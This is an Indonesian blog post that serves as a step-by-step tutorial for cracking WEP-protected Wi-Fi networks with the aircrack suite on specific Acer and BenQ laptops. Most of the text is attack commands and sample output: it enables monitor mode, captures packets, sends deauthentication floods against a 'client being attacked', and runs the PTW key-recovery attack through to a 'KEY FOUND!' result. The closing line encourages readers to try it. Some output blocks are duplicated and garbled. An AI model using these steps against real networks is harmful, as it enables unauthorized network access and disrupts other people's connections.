Aircrak-ptw adalah tool yang digunakan untuk
meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan
spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda.
Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook
adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
|
kalau pake
“stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0″
kemudian
masukkan
$ iwconfig
|
Sistem harus
merespon sebagai berikut :
Interface
Chipset Driver
wifi0
Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?
Step 2 : Start wireless card
$ airmon-ng start wifi0
|
“9″ adalah
channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon
sistem harus sebagai berikut:
Interface
Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?
kemudian
masukkan
$ iwconfig
|
dan pastikan
bahwa resppon sistem sebagai berikut
lo
no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng
digunakan untuk mengcapture paket dari akses point
$ sudo
airodump-ng –channel X –write prefix_for_capture_file interface
|
misal
$ sudo
airodump-ng –channel 3 –write tes ath0
|
“tes”
dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya
tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk
mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$
airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini
dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client
untuk men-generate ARP request.
$ sudo
aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo
aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
|
* -a
BSSID/Mac address akses point
* -c MAC Address client
* -c MAC Address client
* 15 jumlah
paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP
dari akses point.
$ sudo
aircrack-ptw tes-01.cap
atau bisa
juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo
aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo
aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh
output :
i $ sudo
aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 261446 ivs.
Aircrack-ng
1.0 beta1
[00:00:00]
Tested 81 keys (got 21872 IVs)
KB
depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856) 1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856) 2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112) 3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368) 4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND!
[ 00:xD:EF:xx:xx ] ini adalah
key atau password dari wireless network yang didapatkan
|
ACER 4920, OS:lINUX UBUNTU
Pada acer
seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ”
$ sudo airmon-ng stop ath0″ tetapi
$ sudo
airmon-ng start wlan0
untuk
langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri
ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop
eth1″ tetapi
$ airmon-ng
start eth1
Selamat
mencoba
Catatan :
untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”
Tidak ada komentar:
Posting Komentar